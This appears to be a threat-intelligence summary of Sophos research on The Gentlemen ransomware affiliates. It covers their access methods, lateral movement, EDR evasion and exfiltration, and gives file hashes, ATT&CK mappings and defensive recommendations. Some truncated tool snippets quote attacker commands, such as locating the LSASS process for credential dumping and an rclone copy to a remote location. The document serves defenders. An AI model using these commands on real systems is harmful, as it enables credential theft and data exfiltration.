Sophos Details GOLD SHERWOOD’s The Gentlemen Ransomware Playbook

· Original article ↗

Summary

Sophos researchers analyzed 15 incidents linked to The Gentlemen ransomware operation, detailing how affiliates gain access, escalate privileges, evade defenses, exfiltrate data and deploy ransomware—sometimes within 24 hours of observed post-compromise activity.

Key points

  • Sophos CTU analyzed 15 incidents linked to The Gentlemen RaaS, operated by the group it tracks as GOLD SHERWOOD.
  • Affiliates use compromised VPN credentials and may exploit firewall vulnerabilities; one incident involved Fortinet SSL VPN access without MFA.
  • Attackers stage tools in C:\PerfLogs, move laterally using RDP and legitimate credentials, and use native Windows utilities to escalate privileges.
  • Rclone was observed in five incidents; attackers also used Restic and MinIO Client to adapt data exfiltration to their environment.
  • Affiliates attempt to disable EDR and Windows Defender, disrupt backup services, and sometimes clear system logs before ransomware deployment.
  • The median time from first observed post-compromise activity to ransomware deployment was about two days; the shortest was under 24 hours.
  • Sophos recommends enforcing MFA, patching exposed firewalls and VPN appliances, monitoring administrative changes and exfiltration tools, and protecting security and backup systems.

Article Details

Attack Vectors
  • Third-party reports describe affiliates seeking vulnerable FortiGate management interfaces and testing stolen VPN credentials. CTU found artifacts suggesting possible Fortinet endpoint exploitation but could not confirm it.
  • In a February incident, an attacker accessed a Fortinet SSL VPN with compromised user credentials; MFA was not enabled.
  • Attackers used valid domain credentials for RDP lateral movement, including access to file servers and domain controllers.
  • Attackers added accounts to administrative groups, reset administrator passwords, and established additional access through a Cloudflared service or by enabling RDP.
  • Affiliates used Rclone and, in one intrusion, Restic and MinIO Client (mc) to collect and transfer victim data before encryption.
  • Attackers attempted to disable security products with EDR killers and vulnerable drivers, altered Windows Defender settings, disabled backup services, cleared event logs, and deployed ransomware locally or across the network.
Defensive Notes
  • Enforce MFA for VPN and other remote access services, and promptly patch internet-facing firewalls and VPN appliances.
  • Restrict and monitor administrative group changes and RDP exposure; alert on suspicious registry, firewall, and Windows Defender exclusion changes.
  • Monitor unusual execution from C:\PerfLogs and similar staging directories, and investigate anomalous use of data-transfer and backup tools.
  • Protect backup services against unauthorized configuration changes and investigate attempts to disable security processes, clear logs, or deploy vulnerable drivers.

Indicators of compromise

TypeIndicatorContext
MD5002417da707b93bf5ce3cb26d28005f6EDR killer identified as g111.exe.
MD507e9f0b8627a95960e79e930fb099e84Vulnerable driver identified as G11.sys and used by an EDR killer.
MD54741a4976c6abfb3c80c170104518b6eEDR killer identified as acronis.exe.
MD5622b2ca08552535bc142cb815ff9ec16EDR killer identified as acronis.exe.
MD5738df7ae0097f6bef93d65be5d4a2a26EDR killer identified as acronis.exe or hwaudkiller.exe.
MD58ea97d01cbf459b94d134d05c54cd33eVulnerable driver identified as nogbc.sys and used by an EDR killer.
MD5b23b653541bd95bdc4da07a0b07b57bfEDR killer identified as sophos.exe.
MD5bc4a8d7bbbeb941265dfc954539326c0EDR killer identified as eaanticheat2.exe.
MD5d8691ef15eea27cfefafeeb485286080EDR killer identified as y7D0.exe.
SHA1058c3ff21e79770e4a60937c27b1ede227709248EDR killer identified as EASOLO1.exe.
SHA156bee9df5833a637f5c54d5911df98b0812fe643Vulnerable driver identified as G11.sys and used by an EDR killer.
SHA15c9bf6b7e4c7dc9b9227ce86e2d271d624c35147Vulnerable driver identified as nogbc.sys and used by an EDR killer.
SHA18732c1ff565828a0bdef514b5dc0dfea40c1d1f2EDR killer identified as g111.exe.
SHA18bca55b3c9bfbdf68c9b6c72a7b1bf1dd6d5e3b2EDR killer identified as y7D0.exe.
SHA19c0b05eb75f971cc25ee979e49b227b86b19e833EDR killer identified as EASolo1Light.exe.
SHA1a438ba2122a814320f47a056f04122f81c2ae6c5EDR killer identified as EASOLO2.exe.
SHA1a8ba89e67297642dcc1ae77433ab84e1f27d1792EDR killer identified as EASOLO2clear.exe.
SHA1b7cea81e6de895d01d01d20bd6dcfd347940b57fEDR killer identified as eaanticheat2.exe.
SHA1be8c52474ab79a52af31e3cb2f71638299a0de1dEDR killer identified as acronis.exe.
SHA1c96baab9b7e7ef661921d44d7900f165c794ed25EDR killer identified as acronis.exe or hwaudkiller.exe.
SHA1f0537cbb773ae12100b36731e7c39f5a9d852b14EDR killer identified as sophos.exe.
SHA1f0bc50d2d2838c5294e21cd9bce2f09bf581e508EDR killer identified as acronis.exe.
SHA2560be8f415a485b11747bcfd71c9cd9781e090354728f076791ed6845b69ed78fbVulnerable driver identified as nogbc.sys and used by an EDR killer.
SHA2561a9291ec869155336bf185d221d655d11c77a55ea0c8ecc0274202f74a90fcd1EDR killer identified as acronis.exe or hwaudkiller.exe.
SHA2562d91a78e739891c9854c254f5b2a6b84c0e167dfa253466cbccd2cdd1c20145dVulnerable driver identified as G11.sys and used by an EDR killer.
SHA2563a31ec3bf9b7eac6593a723145381f5d0f4ede076c4c8818d949a08f5596ff76EDR killer identified as eaanticheat2.exe.
SHA2563c71537b64487bbf4d1793f72c75d332650d09a77b71e4d884ff15c266a847f6EDR killer identified as y7D0.exe.
SHA25650f2cdf16f05da9253fa2d6eb60d5a42da14c02c551c0874c9e953d4119da69cEDR killer identified as sophos.exe.
SHA25668031d549de399a44bb00614b910106baccef5996623b2f1102352a52a5bb444EDR killer identified as EAAntiCheatClear.exe.
SHA256761ce72420edf5e5531cdbad0e93397d7520cdead825886ca7f75cef76031720EDR killer identified as sophos3.exe.
SHA2567a37acb031cddaa39ad20db0961baa5423ec53f318c49c9275c982507da76d6aEDR killer identified as FaceITClear.exe.
SHA25681053c2c3be8b7dbf7d5087dba05c940b3ee4fd95524272651c816b72c5a9443EDR killer identified as g111.exe.
SHA256a348f5fa048a09188bd706fd3d4efca978990caf3355ecfee501c9f1e19c0efdEDR killer identified as acronis.exe.
SHA256bf7a2fb7f7256809dc690213b85f747cef8db7b909caf9783cac181912fb6207EDR killer identified as sophos2.exe.
SHA256ccdde8091d63eaafbe30d9f0482afd245abc10ab16e21ae9254e51e42cb80ae8Vulnerable driver identified as dmx.sys and used by an EDR killer.
SHA256ddba5b4e7a7ada77d56477e9d41c008f93e81d9a33ed09e77cb2af624fa694feEDR killer identified as acronis.exe.

MITRE ATT&CK

T1003.001 · LSASS MemoryThird-party research confirmed Mimikatz credential harvesting in a The Gentlemen compromise; CTU separately observed attackers retrieving the LSASS process identifier.T1021.001 · Remote Desktop ProtocolAttackers authenticated over RDP to multiple internal systems, including a file server and domain controllers.T1046 · Network Service DiscoveryAttackers used Advanced IP Scanner and SoftPerfect Network Scanner to enumerate the victim network.T1059.001 · PowerShellAttackers ran PowerShell commands to add Windows Defender scanning exclusions.T1059.003 · Windows Command ShellAttackers executed Windows administrative commands and a batch script from a NETLOGON share.T1070.001 · Clear Windows Event LogsIn one incident, an attacker deleted Application, System, and Security logs on multiple hosts.T1078 · Valid AccountsAn attacker authenticated to a Fortinet SSL VPN with compromised user credentials and used valid domain credentials during lateral movement.T1098.007 · Additional Local or Domain GroupsAttackers used Windows administrative commands to add accounts to local Administrators and domain admins groups.T1112 · Modify RegistryAttackers changed registry settings to enable RDP or disable Windows Defender real-time monitoring.T1133 · External Remote ServicesThe attacker gained initial network access through an externally accessible Fortinet SSL VPN service.T1486 · Data Encrypted for ImpactThe deployed ransomware encrypted files and dropped README-GENTLEMEN.txt ransom notes.T1490 · Inhibit System RecoveryAttackers disabled backup and recovery services immediately before ransomware deployment.T1543.003 · Windows ServiceAn attacker installed a Cloudflared agent as a Windows service to maintain a remote access channel.T1562.001 · Disable or Modify ToolsAttackers used EDR killers and vulnerable drivers against security processes and added Windows Defender scanning exclusions.T1567.002 · Exfiltration to Cloud StorageAttackers used Rclone to transfer victim data to remote storage locations and MinIO Client (mc) to copy data to object storage.

CVE

Threat Actors

Malware

Vendors

Products

Datto RMMIn another incident, the threat actor used the Datto RMM tool. However, available telemetry did not make it clear how this tool facilitated the attack. It was only deployed to one compromised device, and no otherESXiGOLD SHERWOOD provides custom ransomware to affiliates. Although there are Windows, Linux, and ESXi-compatible versions of the ransomware, CTU researchers only observed the Windows variant deployed in the analyzedFortiGatein March, Group-IB described how affiliates conducted reconnaissance to identify internet-exposed FortiGate firewall management interfaces vulnerable to CVE-2024-55591. In May, leaked Rocket chat logs showed theFortinet SSL VPNinitial access to a victim’s environment by using compromised user credentials to authenticate to a Fortinet SSL VPN service. The connection originated from an external IP address geolocated to the Netherlands andLinuxGOLD SHERWOOD provides custom ransomware to affiliates. Although there are Windows, Linux, and ESXi-compatible versions of the ransomware, CTU researchers only observed the Windows variant deployed in the analyzedMicrosoft Windowsanalyzed by CTU researchers, the attackers staged tools in the C:\PerfLogs directory. This legitimate Windows system directory typically contains performance monitoring logs. It is not commonly scrutinized bySophos EDRattacker downloaded a vulnerable driver (xkpsm.sys) before leveraging an executable (x.exe) to target Sophos EDR endpoint processes. Existing countermeasures detected these attempts.Windows DefenderIn addition, multiple intrusions involved PowerShell to enforce monitoring exclusions for Windows Defender. For example, the following command excluded an entire directory (the C: drive) from scanning, effectively

Tools

Advanced IP ScannerIn multiple observed intrusions, the threat actors used Advanced IP Scanner to enumerate the network. In one incident, SoftPerfect Network Scanner was executed multiple times across numerous servers in preparation forCloudflaredaccess. In one incident, the threat actor used a compromised administrator account to install a Cloudflared agent as a Windows service. The service was configured to execute the cloudflared.exe tunnel via aFileZillarevealed multiple data exfiltration methods in The Gentlemen ransomware incidents. While MEGAsync and FileZilla occasionally appeared on victims’ systems, Rclone was clearly the preferred exfiltration tool as it wasGentleKillerIn one incident, an attacker deployed three different variants of the custom toolset that ESET calls GentleKiller in an attempt to disable the EDR solution.HavocMEGAsyncCTU analysis revealed multiple data exfiltration methods in The Gentlemen ransomware incidents. While MEGAsync and FileZilla occasionally appeared on victims’ systems, Rclone was clearly the preferred exfiltration toolMimikatztasklist /v /fo csv | findstr /i "lsass"The PID can then be targeted by credential dumping tools such as Mimikatz. Although these tools did not appear in Sophos telemetry, third-party research confirms the use ofMinIO Client (mc)Finally, the attacker employed an additional tool (MinIO Client (mc)) to copy data to object storage:PsExecstaging directories (e.g., C:\PerfLogs\, C:\Users\<username>\Documents\AVAST2\), lateral movement via PsExec, and domain-wide distribution through NETLOGON shares (e.g., \\<compromisedRCloneGentlemen ransomware incidents. While MEGAsync and FileZilla occasionally appeared on victims’ systems, Rclone was clearly the preferred exfiltration tool as it was observed in five of the incidents.Resticrclone copy z:\ <remote location> --include-from filter.txt -pApproximately 25 minutes later, the attacker pivoted to using the Restic backup utility, beginning with repeated repository initialization attempts:SoftPerfect Network Scannerthe threat actors used Advanced IP Scanner to enumerate the network. In one incident, SoftPerfect Network Scanner was executed multiple times across numerous servers in preparation for lateral movement andXkpsm-KillerThe open-source Xkpsm-Killer tool has not previously been observed in The Gentlemen ransomware compromises. The attacker downloaded a vulnerable driver (xkpsm.sys) before leveraging an executable (x.exe) to target

Countries

Related Articles